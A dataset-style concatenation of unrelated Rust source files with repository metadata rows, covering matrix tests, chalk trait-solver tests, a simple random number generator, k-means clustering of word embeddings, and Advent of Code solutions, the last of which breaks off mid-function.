let m4 = test_mat4_1() / 2;
let m3 = test_mat3_1() / 3;
assert_eq!(m4.values[0].x, 0);
assert_eq!(m4.values[0].y, 1);
assert_eq!(m4.values[0].z, 1);
assert_eq!(m4.values[0].w, 2);
assert_eq!(m4.values[1].x, 2);
assert_eq!(m4.values[1].y, 3);
assert_eq!(m4.values[1].z, 3);
assert_eq!(m4.values[1].w, 4);
assert_eq!(m4.values[2].x, 4);
assert_eq!(m4.values[2].y, 5);
assert_eq!(m4.values[2].z, 5);
assert_eq!(m4.values[2].w, 6);
assert_eq!(m4.values[3].x, 6);
assert_eq!(m4.values[3].y, 7);
assert_eq!(m4.values[3].z, 7);
assert_eq!(m4.values[3].w, 8);
assert_eq!(m3.values[0].x, 11);
assert_eq!(m3.values[0].y, 11);
assert_eq!(m3.values[0].z, 11);
assert_eq!(m3.values[1].x, 12);
assert_eq!(m3.values[1].y, 12);
assert_eq!(m3.values[1].z, 12);
assert_eq!(m3.values[2].x, 13);
assert_eq!(m3.values[2].y, 13);
assert_eq!(m3.values[2].z, 13);
}
#[test]
fn can_divide_assign_matrices_by_scalars () {
let mut m4 = test_mat4_1();
m4 /= 2;
let mut m3 = test_mat3_1();
m3 /= 3;
assert_eq!(m4.values[0].x, 0);
assert_eq!(m4.values[0].y, 1);
assert_eq!(m4.values[0].z, 1);
assert_eq!(m4.values[0].w, 2);
assert_eq!(m4.values[1].x, 2);
assert_eq!(m4.values[1].y, 3);
assert_eq!(m4.values[1].z, 3);
assert_eq!(m4.values[1].w, 4);
assert_eq!(m4.values[2].x, 4);
assert_eq!(m4.values[2].y, 5);
assert_eq!(m4.values[2].z, 5);
assert_eq!(m4.values[2].w, 6);
assert_eq!(m4.values[3].x, 6);
assert_eq!(m4.values[3].y, 7);
assert_eq!(m4.values[3].z, 7);
assert_eq!(m4.values[3].w, 8);
assert_eq!(m3.values[0].x, 11);
assert_eq!(m3.values[0].y, 11);
assert_eq!(m3.values[0].z, 11);
assert_eq!(m3.values[1].x, 12);
assert_eq!(m3.values[1].y, 12);
assert_eq!(m3.values[1].z, 12);
assert_eq!(m3.values[2].x, 13);
assert_eq!(m3.values[2].y, 13);
assert_eq!(m3.values[2].z, 13);
}
#[test]
fn can_index_matrices () {
let m4 = test_mat4_1();
let m3 = test_mat3_1();
assert_eq!(m4[0].x, 1);
assert_eq!(m4[0].y, 2);
assert_eq!(m4[0].z, 3);
assert_eq!(m4[0].w, 4);
assert_eq!(m4[1].x, 5);
assert_eq!(m4[1].y, 6);
assert_eq!(m4[1].z, 7);
assert_eq!(m4[1].w, 8);
assert_eq!(m4[2].x, 9);
assert_eq!(m4[2].y, 10);
assert_eq!(m4[2].z, 11);
assert_eq!(m4[2].w, 12);
assert_eq!(m4[3].x, 13);
assert_eq!(m4[3].y, 14);
assert_eq!(m4[3].z, 15);
assert_eq!(m4[3].w, 16);
assert_eq!(m3.values[0].x, 33);
assert_eq!(m3.values[0].y, 34);
assert_eq!(m3.values[0].z, 35);
assert_eq!(m3.values[1].x, 36);
assert_eq!(m3.values[1].y, 37);
assert_eq!(m3.values[1].z, 38);
assert_eq!(m3.values[2].x, 39);
assert_eq!(m3.values[2].y, 40);
assert_eq!(m3.values[2].z, 41);
}
#[test]
#[should_panic]
fn cannot_index_matrices_out_of_bounds () {
let m4 = test_mat4_1();
let _ = m4[4];
}
#[test]
fn can_assign_to_matrices_by_index () {
let mut m4 = test_mat4_1();
m4[0].x = 17;
m4[0].y = 18;
m4[0].z = 19;
m4[0].w = 20;
m4[1].x = 21;
m4[1].y = 22;
m4[1].z = 23;
m4[1].w = 24;
m4[2].x = 25;
m4[2].y = 26;
m4[2].z = 27;
m4[2].w = 28;
m4[3].x = 29;
m4[3].y = 30;
m4[3].z = 31;
m4[3].w = 32;
assert_eq!(m4[0].x, 17);
assert_eq!(m4[0].y, 18);
assert_eq!(m4[0].z, 19);
assert_eq!(m4[0].w, 20);
assert_eq!(m4[1].x, 21);
assert_eq!(m4[1].y, 22);
assert_eq!(m4[1].z, 23);
assert_eq!(m4[1].w, 24);
assert_eq!(m4[2].x, 25);
assert_eq!(m4[2].y, 26);
assert_eq!(m4[2].z, 27);
assert_eq!(m4[2].w, 28);
assert_eq!(m4[3].x, 29);
assert_eq!(m4[3].y, 30);
assert_eq!(m4[3].z, 31);
assert_eq!(m4[3].w, 32);
let mut m3 = test_mat3_1();
m3[0].x = 42;
m3[0].y = 43;
m3[0].z = 44;
m3[1].x = 45;
m3[1].y = 46;
m3[1].z = 47;
m3[2].x = 48;
m3[2].y = 49;
m3[2].z = 50;
assert_eq!(m3[0].x, 42);
assert_eq!(m3[0].y, 43);
assert_eq!(m3[0].z, 44);
assert_eq!(m3[1].x, 45);
assert_eq!(m3[1].y, 46);
assert_eq!(m3[1].z, 47);
assert_eq!(m3[2].x, 48);
assert_eq!(m3[2].y, 49);
assert_eq!(m3[2].z, 50);
}
#[test]
#[should_panic]
fn cannot_assign_to_matrix_out_of_bounds () {
let mut m4 = test_mat4_1();
m4[4] = test_vec4();
}
#[test]
fn can_create_scale_matrix () {
let v4 = test_vec4();
let v3 = test_vec3();
let v2 = test_vec2();
let m4 = Mat4::<i32>::scale(&v3);
assert_eq!(m4[0].x, 5);
assert_eq!(m4[0].y, 0);
assert_eq!(m4[0].z, 0);
assert_eq!(m4[0].w, 0);
assert_eq!(m4[1].x, 0);
assert_eq!(m4[1].y, 6);
assert_eq!(m4[1].z, 0);
assert_eq!(m4[1].w, 0);
assert_eq!(m4[2].x, 0);
assert_eq!(m4[2].y, 0);
assert_eq!(m4[2].z, 1);
assert_eq!(m4[2].w, 0);
assert_eq!(m4[3].x, 0);
assert_eq!(m4[3].y, 0);
assert_eq!(m4[3].z, 0);
assert_eq!(m4[3].w, 1);
let scaled4 = m4 * v4;
assert_eq!(scaled4.x, v4.x * v3.x);
assert_eq!(scaled4.y, v4.y * v3.y);
assert_eq!(scaled4.z, v4.z * v3.z);
assert_eq!(scaled4.w, v4.w);
let m3 = Mat3::<i32>::scale(&v2);
assert_eq!(m3[0].x, 8);
assert_eq!(m3[0].y, 0);
assert_eq!(m3[0].z, 0);
assert_eq!(m3[1].x, 0);
assert_eq!(m3[1].y, 9);
assert_eq!(m3[1].z, 0);
assert_eq!(m3[2].x, 0);
assert_eq!(m3[2].y, 0);
assert_eq!(m3[2].z, 1);
let scaled3 = m3 * v3;
assert_eq!(scaled3.x, v3.x * v2.x);
assert_eq!(scaled3.y, v3.y * v2.y);
}
#[test]
fn can_create_translation_matrix () {
let v4 = test_vec4();
let v3 = test_vec3();
let v2 = test_vec2();
let m4 = Mat4::<i32>::translate(&v3);
assert_eq!(m4[0].x, 1);
assert_eq!(m4[0].y, 0);
assert_eq!(m4[0].z, 0);
assert_eq!(m4[0].w, 5);
assert_eq!(m4[1].x, 0);
assert_eq!(m4[1].y, 1);
assert_eq!(m4[1].z, 0);
assert_eq!(m4[1].w, 6);
assert_eq!(m4[2].x, 0);
assert_eq!(m4[2].y, 0);
assert_eq!(m4[2].z, 1);
assert_eq!(m4[2].w, 1);
assert_eq!(m4[3].x, 0);
assert_eq!(m4[3].y, 0);
assert_eq!(m4[3].z, 0);
assert_eq!(m4[3].w, 1);
let translated4 = m4 * v4;
let added4 = Vec3 {x: v4.x, y: v4.y, z: v4.z} + v3;
assert_eq!(translated4.x, added4.x);
assert_eq!(translated4.y, added4.y);
assert_eq!(translated4.z, added4.z);
let m3 = Mat3::<i32>::translate(&v2);
assert_eq!(m3[0].x, 1);
assert_eq!(m3[0].y, 0);
assert_eq!(m3[0].z, 8);
assert_eq!(m3[1].x, 0);
assert_eq!(m3[1].y, 1);
assert_eq!(m3[1].z, 9);
assert_eq!(m3[2].x, 0);
assert_eq!(m3[2].y, 0);
assert_eq!(m3[2].z, 1);
let translated3 = m3 * v3;
let added3 = Vec2 {x: v3.x, y: v3.y} + v2;
assert_eq!(translated3.x, added3.x);
assert_eq!(translated3.y, added3.y);
}
#[test]
fn can_create_cross_product_matrix () {
let v3 = test_vec3f_1();
let m3 = Mat3::<f32>::cross_product(&v3);
assert_approx_eq!(m3[0].x, 0.0, EPSILON);
assert_approx_eq!(m3[0].y, -1.0, EPSILON);
assert_approx_eq!(m3[0].z, 6.0, EPSILON);
assert_approx_eq!(m3[1].x, 1.0, EPSILON);
assert_approx_eq!(m3[1].y, 0.0, EPSILON);
assert_approx_eq!(m3[1].z, -5.0, EPSILON);
assert_approx_eq!(m3[2].x, -6.0, EPSILON);
assert_approx_eq!(m3[2].y, 5.0, EPSILON);
assert_approx_eq!(m3[2].z, 0.0, EPSILON);
let transformed = m3 * test_vec3f_2();
let cross_product = v3.cross(test_vec3f_2());
assert_approx_eq!(transformed.x, cross_product.x, EPSILON);
assert_approx_eq!(transformed.y, cross_product.y, EPSILON);
assert_approx_eq!(transformed.z, cross_product.z, EPSILON);
}
#[test]
fn can_create_tensor_matrix () {
let v3_1 = test_vec3f_1();
let v3_2 = test_vec3f_2();
let tensor = Mat3::<f32>::tensor(&v3_1, &v3_2);
assert_approx_eq!(tensor[0].x, v3_1.x * v3_2.x, EPSILON);
assert_approx_eq!(tensor[0].y, v3_1.x * v3_2.y, EPSILON);
assert_approx_eq!(tensor[0].z, v3_1.x * v3_2.z, EPSILON);
assert_approx_eq!(tensor[1].x, v3_1.y * v3_2.x, EPSILON);
assert_approx_eq!(tensor[1].y, v3_1.y * v3_2.y, EPSILON);
assert_approx_eq!(tensor[1].z, v3_1.y * v3_2.z, EPSILON);
assert_approx_eq!(tensor[2].x, v3_1.z * v3_2.x, EPSILON);
assert_approx_eq!(tensor[2].y, v3_1.z * v3_2.y, EPSILON);
assert_approx_eq!(tensor[2].z, v3_1.z * v3_2.z, EPSILON);
}
#[test]
fn can_transpose_matrix () {
let mut m4 = test_mat4_1();
let mut m3 = test_mat3_1();
let transposed4 = m4.transposed();
let transposed3 = m3.transposed();
assert_eq!(transposed4[0].x, m4[0].x);
assert_eq!(transposed4[0].y, m4[1].x);
assert_eq!(transposed4[0].z, m4[2].x);
assert_eq!(transposed4[0].w, m4[3].x);
assert_eq!(transposed4[1].x, m4[0].y);
assert_eq!(transposed4[1].y, m4[1].y);
assert_eq!(transposed4[1].z, m4[2].y);
assert_eq!(transposed4[1].w, m4[3].y);
assert_eq!(transposed4[2].x, m4[0].z);
assert_eq!(transposed4[2].y, m4[1].z);
assert_eq!(transposed4[2].z, m4[2].z);
assert_eq!(transposed4[2].w, m4[3].z);
assert_eq!(transposed4[3].x, m4[0].w);
assert_eq!(transposed4[3].y, m4[1].w);
assert_eq!(transposed4[3].z, m4[2].w);
assert_eq!(transposed4[3].w, m4[3].w);
assert_eq!(transposed3[0].x, m3[0].x);
assert_eq!(transposed3[0].y, m3[1].x);
assert_eq!(transposed3[0].z, m3[2].x);
assert_eq!(transposed3[1].x, m3[0].y);
assert_eq!(transposed3[1].y, m3[1].y);
assert_eq!(transposed3[1].z, m3[2].y);
assert_eq!(transposed3[2].x, m3[0].z);
assert_eq!(transposed3[2].y, m3[1].z);
assert_eq!(transposed3[2].z, m3[2].z);
m4.transpose();
m3.transpose();
assert_eq!(transposed4[0].x, m4[0].x);
assert_eq!(transposed4[0].y, m4[0].y);
assert_eq!(transposed4[0].z, m4[0].z);
assert_eq!(transposed4[0].w, m4[0].w);
assert_eq!(transposed4[1].x, m4[1].x);
assert_eq!(transposed4[1].y, m4[1].y);
assert_eq!(transposed4[1].z, m4[1].z);
assert_eq!(transposed4[1].w, m4[1].w);
assert_eq!(transposed4[2].x, m4[2].x);
assert_eq!(transposed4[2].y, m4[2].y);
assert_eq!(transposed4[2].z, m4[2].z);
assert_eq!(transposed4[2].w, m4[2].w);
assert_eq!(transposed4[3].x, m4[3].x);
assert_eq!(transposed4[3].y, m4[3].y);
assert_eq!(transposed4[3].z, m4[3].z);
assert_eq!(transposed4[3].w, m4[3].w);
assert_eq!(transposed3[0].x, m3[0].x);
assert_eq!(transposed3[0].y, m3[0].y);
assert_eq!(transposed3[0].z, m3[0].z);
assert_eq!(transposed3[1].x, m3[1].x);
assert_eq!(transposed3[1].y, m3[1].y);
assert_eq!(transposed3[1].z, m3[1].z);
assert_eq!(transposed3[2].x, m3[2].x);
assert_eq!(transposed3[2].y, m3[2].y);
assert_eq!(transposed3[2].z, m3[2].z);
}
#[test]
fn can_create_rotation_matrix () {
let axis = test_vec3f_1().normalized();
let v4 = Vec4 {x: axis.y, y: -axis.x, z: 0f32, w: 1f32} * test_vec4f().length();
let m4 = Mat4::<f32>::rotate(&axis, 45.0);
assert_approx_eq!(m4[0].x, 0.825, EPSILON);
assert_approx_eq!(m4[0].y, 0.052, EPSILON);
assert_approx_eq!(m4[0].z, 0.562, EPSILON);
assert_approx_eq!(m4[0].w, 0.000, EPSILON);
assert_approx_eq!(m4[1].x, 0.232, EPSILON);
assert_approx_eq!(m4[1].y, 0.877, EPSILON);
assert_approx_eq!(m4[1].z, -0.421, EPSILON);
assert_approx_eq!(m4[1].w, 0.000, EPSILON);
assert_approx_eq!(m4[2].x, -0.515, EPSILON);
assert_approx_eq!(m4[2].y, 0.477, EPSILON);
assert_approx_eq!(m4[2].z, 0.712, EPSILON);
assert_approx_eq!(m4[2].w, 0.000, EPSILON);
assert_approx_eq!(m4[3].x, 0.000, EPSILON);
assert_approx_eq!(m4[3].y, 0.000, EPSILON);
assert_approx_eq!(m4[3].z, 0.000, EPSILON);
assert_approx_eq!(m4[3].w, 1.000, EPSILON);
let rotated = m4 * v4;
assert_approx_eq!(v4.length(), rotated.length(), EPSILON);
let v4_trimmed = Vec3 {x: v4.x, y: v4.y, z: v4.z };
let rot_trimmed = Vec3 {x: rotated.x, y: rotated.y, z: rotated.z};
assert_approx_eq!(v4_trimmed.angle(rot_trimmed), 45.0, EPSILON);
}
// fn test_mat4_1() -> Mat4<i32> {
// Mat4{values: [Vec4{x: 1, y: 2, z: 3, w: 4 },
// Vec4{x: 5, y: 6, z: 7, w: 8 },
// Vec4{x: 9, y: 10, z: 11, w: 12},
// Vec4{x: 13, y: 14, z: 15, w: 16}]}
// }
//
// fn test_mat4_2() -> Mat4<i32> {
// Mat4{values: [Vec4{x: 17, y: 18, z: 19, w: 20},
// Vec4{x: 21, y: 22, z: 23, w: 24},
// Vec4{x: 25, y: 26, z: 27, w: 28},
// Vec4{x: 29, y: 30, z: 31, w: 32}]}
// }
}
| true |
36a33115f933c37278d64c4161b64469e646257b
|
Rust
|
rust-lang/chalk
|
/tests/test/discriminant_kind.rs
|
UTF-8
| 4,404 | 2.921875 | 3 |
[
"Apache-2.0",
"BSD-3-Clause",
"bzip2-1.0.6",
"LicenseRef-scancode-other-permissive",
"NCSA",
"MIT",
"ISC",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"Unlicense"
] |
permissive
|
use super::*;
// Test that user-provided impls of `DiscriminantKind` are prohibited:
// the lang-item trait may only be implemented by the solver itself.
#[test]
fn no_discriminant_kind_impls() {
    lowering_error! {
        program {
            #[lang(discriminant_kind)]
            trait DiscriminantKind {
                type Discriminant;
            }
            // A hand-written impl must be rejected during lowering.
            impl DiscriminantKind for u32 {
                type Discriminant = u32;
            }
        } error_msg {
            "trait impl for `DiscriminantKind` does not meet well-formedness requirements"
        }
    }
}
// Test that all types are implementing DiscriminantKind
#[test]
fn discriminant_kind_impl() {
    test! {
        program {
            #[lang(discriminant_kind)]
            trait DiscriminantKind {
                type Discriminant;
            }
            #[object_safe]
            trait Principal {}
            struct A { }
        }
        // User-defined structs implement the built-in trait...
        goal {
            A: DiscriminantKind
        } yields {
            expect![["Unique"]]
        }
        // ...as do scalars...
        goal {
            i32: DiscriminantKind
        } yields {
            expect![["Unique"]]
        }
        // ...tuples...
        goal {
            (i32, A): DiscriminantKind
        } yields {
            expect![["Unique"]]
        }
        // ...and trait objects, for any lifetime.
        goal {
            forall<'a> {
                dyn Principal + 'a: DiscriminantKind
            }
        } yields {
            expect![["Unique"]]
        }
    }
}
// Checks what `<T as DiscriminantKind>::Discriminant` normalizes to for
// enums with and without an explicit `#[repr]`, generators, trait
// objects, and placeholder types.
#[test]
fn discriminant_kind_assoc() {
    test! {
        program {
            #[lang(discriminant_kind)]
            trait DiscriminantKind {
                type Discriminant;
            }
            #[object_safe]
            trait Principal {}
            enum A { }
            #[repr(isize)]
            enum B { }
            #[repr(i32)]
            enum C {}
            #[repr(u32)]
            enum D {}
            #[repr(usize)]
            enum E {}
            generator empty_gen<>[resume = (), yield = ()] {
                upvars []
                witnesses []
            }
        }
        // Discriminant for types with no discriminant should be u8
        goal {
            Normalize(<u32 as DiscriminantKind>::Discriminant -> u8)
        } yields {
            expect![["Unique"]]
        }
        // Same as above
        goal {
            forall<'a> {
                Normalize(<dyn Principal + 'a as DiscriminantKind>::Discriminant -> u8)
            }
        } yields {
            expect![["Unique"]]
        }
        // Discriminant for enums with unspecified discriminant should be isize
        goal {
            Normalize(<A as DiscriminantKind>::Discriminant -> isize)
        } yields {
            expect![["Unique"]]
        }
        // Discriminant should be the same as specified in `repr`
        // -----
        goal {
            Normalize(<B as DiscriminantKind>::Discriminant -> isize)
        } yields {
            expect![["Unique"]]
        }
        goal {
            Normalize(<C as DiscriminantKind>::Discriminant -> i32)
        } yields {
            expect![["Unique"]]
        }
        goal {
            Normalize(<D as DiscriminantKind>::Discriminant -> u32)
        } yields {
            expect![["Unique"]]
        }
        goal {
            Normalize(<E as DiscriminantKind>::Discriminant -> usize)
        } yields {
            expect![["Unique"]]
        }
        //--------
        // Generators have u32 as the discriminant
        goal {
            Normalize(<empty_gen as DiscriminantKind>::Discriminant -> u32)
        } yields {
            expect![["Unique"]]
        }
        // Placeholders don't have a determined discriminant
        goal {
            forall<T> {
                exists<U> {
                    <T as DiscriminantKind>::Discriminant = U
                }
            }
        } yields {
            expect![["Unique; substitution [?0 := (DiscriminantKind::Discriminant)<!1_0>]"]]
        }
    }
}
// The discriminant of a not-yet-inferred enum instantiation can still be
// normalized; the element type remains an inference variable in the
// resulting substitution.
#[test]
fn discriminant_kind_with_infer_var() {
    test! {
        program {
            #[lang(discriminant_kind)]
            trait DiscriminantKind {
                type Discriminant;
            }
            enum Option<T> {}
        }
        goal {
            exists<T> {
                Normalize(<Option<T> as DiscriminantKind>::Discriminant -> isize)
            }
        } yields {
            expect![[r#"Unique; for<?U0> { substitution [?0 := ^0.0] }"#]]
        }
    }
}
| true |
07e9e7410aa4e2c3c9b4bb009ea8c6f842287963
|
Rust
|
oro13/rust-algos-practice
|
/sorting/src/b_rand.rs
|
UTF-8
| 974 | 3.390625 | 3 |
[] |
no_license
|
// Generate pseudo-random numbers by storing a large number in `curr`,
// multiplying it by another large number,
// incrementing that new number,
// and then taking the modulo, so the result remains within a given range.
// `mul` and `inc` should be less than the modulo, to save computation;
// they should be prime, to lower the frequency of repeated numbers.
use lazy_static;
use std::sync::Mutex;
lazy_static::lazy_static! {
    // Single process-wide generator behind a mutex, seeded with a fixed
    // value, so the sequence is identical on every run.
    static ref RG: Mutex<RandGen> = Mutex::new(RandGen::new(34052));
}
/// Returns the next pseudo-random number in `0..max` from the global
/// generator. Panics if `max` is 0 (modulo by zero) or if the mutex is
/// poisoned.
pub fn rand(max: usize) -> usize {
    RG.lock().unwrap().next_val(max)
}
/// A linear congruential generator: `next = (curr * mul + inc) % modulo`.
pub struct RandGen {
    curr: usize,
    mul: usize,
    inc: usize,
    modulo: usize,
}
impl RandGen {
    /// Builds a generator seeded with `curr`; multiplier, increment and
    /// modulus are fixed constants chosen for this generator.
    pub fn new(curr: usize) -> Self {
        RandGen {
            curr,
            mul: 4259461,
            inc: 7060771,
            modulo: 81935240129,
        }
    }
    /// Advances the generator one step and maps the new state into
    /// `0..max`. Panics if `max` is 0.
    pub fn next_val(&mut self, max: usize) -> usize {
        let advanced = (self.curr * self.mul + self.inc) % self.modulo;
        self.curr = advanced;
        advanced % max
    }
}
| true |
304cc565e5c64f9d8a87626144a8460443553dcc
|
Rust
|
MichaelAquilina/adventofcode2017
|
/day1/src/main.rs
|
UTF-8
| 1,880 | 3.546875 | 4 |
[] |
no_license
|
extern crate clap;
use clap::{Arg, App};
use std::fs::File;
use std::io::prelude::*;
fn main() {
    // CLI: a required input file plus an optional puzzle part (1 or 2).
    let matches = App::new("Advent of Code 2017 - Day 1")
        .arg(Arg::with_name("filename")
             .required(true))
        .arg(Arg::with_name("part")
             .possible_values(&["1", "2"]))
        .get_matches();
    let filename = matches.value_of("filename").unwrap();
    let part = matches.value_of("part").unwrap_or("1");
    let mut file = File::open(filename).unwrap();
    let mut contents = String::new();
    file.read_to_string(&mut contents).unwrap();
    // Trim so a trailing newline is not compared as a digit.
    contents = contents.trim().to_string();
    // Part 1 compares each digit with its immediate neighbor; part 2 with
    // the digit halfway around the circular sequence.
    let skip: usize = match part {
        "1" => 1,
        _ => contents.len() / 2,
    };
    let result = solve(&contents, skip);
    println!("{}", result);
}
/// Sums every digit that matches the digit `skip` positions ahead,
/// wrapping around the end of the string (AoC 2017 day 1 "captcha").
///
/// Returns 0 for an empty string. Panics ("Not a digit!") if a matching
/// character is not an ASCII digit, mirroring the previous behavior.
fn solve(contents: &str, skip: usize) -> u32 {
    // Collect once so each lookup is O(1). The previous version called
    // `.chars().nth(...)` twice per iteration, rescanning the string from
    // the start each time and making the whole pass O(n^2).
    let chars: Vec<char> = contents.chars().collect();
    let length = chars.len();
    let mut total: u32 = 0;
    for (index, &current) in chars.iter().enumerate() {
        // Safe even for `skip >= length`; the loop body never runs when
        // `length == 0`, so the modulo cannot divide by zero.
        let partner = chars[(index + skip) % length];
        if current == partner {
            total += current.to_digit(10).expect("Not a digit!");
        }
    }
    total
}
#[cfg(test)]
mod test {
    use super::*;
    // Examples from the day 1 puzzle description, part one (skip = 1:
    // compare each digit with its immediate circular neighbor).
    #[test]
    fn test_part1() {
        assert_eq!(solve("1122", 1), 3);
        assert_eq!(solve("1111", 1), 4);
        assert_eq!(solve("22", 1), 4);
        assert_eq!(solve("", 1), 0);
        assert_eq!(solve("1234", 1), 0);
        assert_eq!(solve("91212129", 1), 9);
    }
    // Part two examples (skip = len / 2: compare with the digit halfway
    // around the sequence).
    #[test]
    fn test_part2() {
        assert_eq!(solve("", 0), 0);
        assert_eq!(solve("1212", 2), 6);
        assert_eq!(solve("1221", 2), 0);
        assert_eq!(solve("123425", 3), 4);
        assert_eq!(solve("123123", 3), 12);
        assert_eq!(solve("12131415", 4), 4);
    }
}
| true |
b270488720b475a0c171d09e44c018dd8810f694
|
Rust
|
ardwalker/learn-rust
|
/src/rc.rs
|
UTF-8
| 312 | 3.46875 | 3 |
[] |
no_license
|
#[cfg(test)]
mod tests {
    use std::ops::Mul;
    use std::rc::Rc;
    /// `Rc` derefs to its payload, so trait methods of the wrapped value
    /// can be called straight through the smart pointer.
    #[test]
    fn simple_rc() {
        let five = Rc::new(5);
        assert_eq!(five.mul(5), 25);
    }
    /// Placeholder: constructs an `Rc<&str>` but asserts nothing yet.
    #[test]
    fn rc_pin() {
        let _five = Rc::new("hello");
    }
}
| true |
73d439d2cca0e96cad13efe947d878079c0075bf
|
Rust
|
ysmiraak/ir-homework
|
/kmeans/src/bin/kmeans.rs
|
UTF-8
| 2,947 | 2.6875 | 3 |
[
"MIT"
] |
permissive
|
// Author: Kuan Yu, 3913893
// Honor Code: I pledge that this program represents my own work.
extern crate kmeans;
extern crate getopts;
extern crate rust2vec;
use getopts::Options;
use std::fs::File;
use std::path::Path;
use std::env::args;
use std::process::exit;
use std::io::{BufReader, BufWriter, Write};
use rust2vec::{Embeddings, ReadWord2Vec};
use kmeans::{kmeans, step_sample, arg_max};
fn main() {
    // Parse CLI options; only `-i` is required, everything else defaults.
    let (path_in, path_out, opt_k, epsilon, max_iter, verbose) = {
        let mut opts = Options::new();
        opts.reqopt("i", "input", "the binary embeddings file.", "")
            .optopt("o", "output", "the output tsv file; default: `word_cluster.tsv`.", "")
            .optopt("k", "centers", "the number of clusters; default: `sqrt(|data|)`.", "")
            .optopt("e", "epsilon", "tolerance for convergence; default: `0.05`.", "")
            .optopt("m", "max-iter", "the maximum number of iterations; default: `25`.", "")
            .optopt("v", "verbose", "`false` or `true` by default.", "");
        let matches = match opts.parse(args().skip(1)) {
            Err(e) => {
                println!("{}", opts.usage(&e.to_string()))
                ;
                exit(1)
            }
            Ok(m) => m,
        };
        // Unparsable option values silently fall back to the defaults.
        (matches.opt_str("i").unwrap(),
         matches.opt_str("o").unwrap_or("word_cluster.tsv".to_owned()),
         matches.opt_str("k").unwrap_or_default().parse::<usize>().ok(),
         matches.opt_str("e").unwrap_or_default().parse::<f32>().unwrap_or(0.05),
         matches.opt_str("m").unwrap_or_default().parse::<usize>().unwrap_or(25),
         matches.opt_str("v").unwrap_or_default().parse::<bool>().unwrap_or(true))
    };
    if verbose { println!("loading embeddings ...");}
    // Normalizing the embeddings makes the dot product used below act as
    // cosine similarity.
    let embeddings = {
        let mut emb = Embeddings::read_word2vec_binary(&mut BufReader::new(open_file(&path_in)))
            .unwrap();
        emb.normalize();
        emb
    };
    let centroids = {
        let data = embeddings.data();
        // Rule-of-thumb default: k = sqrt(number of data points).
        let k = opt_k.unwrap_or(f32::sqrt(data.rows() as f32) as usize);
        if verbose { println!("number of clusters:\t{}", k);}
        kmeans(&data, step_sample(&data, k), epsilon, max_iter, verbose)
    };
    // Write one "<word>\t<cluster-index>" line per embedding.
    let mut wtr = BufWriter::new(create_file(&path_out));
    if verbose { println!("writing to {} ...", path_out);}
    for (word, embedding) in embeddings.iter() {
        writeln!(wtr, "{}\t{}", word, arg_max(&centroids.dot(&embedding))).unwrap();
    }
}
/// Opens `path` for reading; on failure prints a diagnostic and
/// terminates the process with exit code 1 (this is a CLI helper, not a
/// recoverable API).
pub fn open_file<P>(path: P) -> File
    where P: AsRef<Path>
{
    match File::open(&path) {
        Err(_) => {
            // Diagnostics go to stderr so they don't pollute output that
            // may be piped or redirected (previously printed to stdout).
            eprintln!("cannot open file: {:?}", path.as_ref());
            exit(1)
        }
        Ok(file) => file,
    }
}
/// Creates (or truncates) `path` for writing; on failure prints a
/// diagnostic and terminates the process with exit code 1.
pub fn create_file<P>(path: P) -> File
    where P: AsRef<Path>
{
    match File::create(&path) {
        Err(_) => {
            // Diagnostics go to stderr so they don't pollute output that
            // may be piped or redirected (previously printed to stdout).
            eprintln!("cannot create file: {:?}", path.as_ref());
            exit(1)
        }
        Ok(file) => file,
    }
}
| true |
d237eee3b04da4e239274a70bfebb854f5b5e430
|
Rust
|
makadaw/advent-of-code-2020
|
/src/day22.rs
|
UTF-8
| 2,462 | 3.25 | 3 |
[
"MIT"
] |
permissive
|
use std::collections::HashSet;
/// A player's deck of cards; the front of the `Vec` is the top of the deck.
type Deck = Vec<usize>;
#[aoc_generator(day22)]
pub fn input_generator(input: &str) -> (Deck, Deck) {
    // Input is two blocks separated by a blank line, each a "Player N:"
    // header followed by one card value per line. `skip(1)` drops the
    // header; `flat_map(parse)` silently skips any non-numeric line.
    let decks: Vec<Deck> = input
        .split("\n\n")
        .map(|d| d.lines().skip(1).flat_map(str::parse::<usize>).collect())
        .collect();
    // Panics if the input has fewer than two blocks.
    (decks[0].to_vec(), decks[1].to_vec())
}
/// Plays a game of Combat (or Recursive Combat when `with_recursive` is
/// set) between the two decks, mutating them in place. The front of each
/// `Vec` is the top of the deck.
///
/// Returns 1 if player 1 wins, 2 if player 2 wins. Under recursive rules,
/// a repeated deck configuration ends the game immediately in player 1's
/// favor (loop-prevention rule).
fn game(deck1: &mut Vec<usize>, deck2: &mut Vec<usize>, with_recursive: bool) -> usize {
    let mut player1_wins_by_repetition = false;
    let mut seen: HashSet<Vec<usize>> = HashSet::new();
    while !deck1.is_empty() && !deck2.is_empty() {
        // Explicit parentheses: the previous version relied on `&&`
        // binding tighter than `||`, which only behaved as intended
        // because `seen` stays empty when `with_recursive` is false.
        if with_recursive && (seen.contains(&deck1.to_vec()) || seen.contains(&deck2.to_vec())) {
            player1_wins_by_repetition = true;
            break;
        }
        if with_recursive {
            seen.insert(deck1.to_vec());
            seen.insert(deck2.to_vec());
        }
        // Both players draw their top card.
        let (card1, card2) = (deck1.remove(0), deck2.remove(0));
        if with_recursive && deck1.len() >= card1 && deck2.len() >= card2 {
            // Recursive sub-game, played on copies of the next `card1` /
            // `card2` cards of the respective decks.
            if game(
                &mut deck1[..card1].to_vec(),
                &mut deck2[..card2].to_vec(),
                with_recursive,
            ) == 1
            {
                deck1.push(card1);
                deck1.push(card2);
            } else {
                deck2.push(card2);
                deck2.push(card1);
            }
        } else if card1 > card2 {
            // Round winner puts their own card below the loser's card.
            deck1.push(card1);
            deck1.push(card2);
        } else if card1 < card2 {
            deck2.push(card2);
            deck2.push(card1);
        }
        // Equal cards are discarded (cannot occur with valid puzzle input).
    }
    if player1_wins_by_repetition || deck2.is_empty() {
        1
    } else {
        2
    }
}
/// Part 1: play regular Combat and return the winner's score (the bottom
/// card counts once, the next twice, and so on up the deck).
#[aoc(day22, part1)]
pub fn solve_part1(input: &(Deck, Deck)) -> usize {
    let (mut deck1, mut deck2) = input.clone();
    let winner = if game(&mut deck1, &mut deck2, false) == 1 {
        deck1
    } else {
        deck2
    };
    // Debug dump of the winning deck, kept from the original.
    println!("{:?}", winner);
    winner
        .iter()
        .enumerate()
        // Card at position i from the top is worth value * (len - i).
        .map(|(i, v)| v * (winner.len() - i))
        .sum()
}
/// Part 2: identical to part 1 but plays Recursive Combat
/// (`with_recursive = true`) before scoring the winning deck.
#[aoc(day22, part2)]
pub fn solve_part2(input: &(Deck, Deck)) -> usize {
    let (mut deck1, mut deck2) = input.clone();
    let winner = if game(&mut deck1, &mut deck2, true) == 1 {
        deck1
    } else {
        deck2
    };
